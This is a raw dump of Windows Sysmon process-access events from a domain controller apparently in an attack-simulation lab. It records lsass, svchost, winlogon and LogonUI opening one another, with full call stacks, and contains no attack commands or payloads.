09:21:44.545{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055287Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.545{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+1d1c8|C:\Windows\system32\lsasrv.dll+1c3f1|C:\Windows\system32\lsasrv.dll+1ac10|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055286Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.545{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d7e|C:\Windows\system32\lsasrv.dll+195f6|C:\Windows\system32\lsasrv.dll+1ab9f|C:\Windows\system32\lsasrv.dll+2704b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055285Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.530{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055284Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.514{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055283Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.514{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055282Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.514{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055281Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.514{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055280Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.514{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055279Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.514{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055278Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.514{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055277Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.514{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055276Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.514{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055275Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.514{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055274Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.514{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8D26-6151-8600-00000000FD01}1288C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055273Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.483{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055272Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.483{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055271Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.483{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055270Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.483{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055269Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.483{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055268Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.483{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055267Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.467{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055266Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:44.467{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D27-6151-8700-00000000FD01}3724C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055265Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 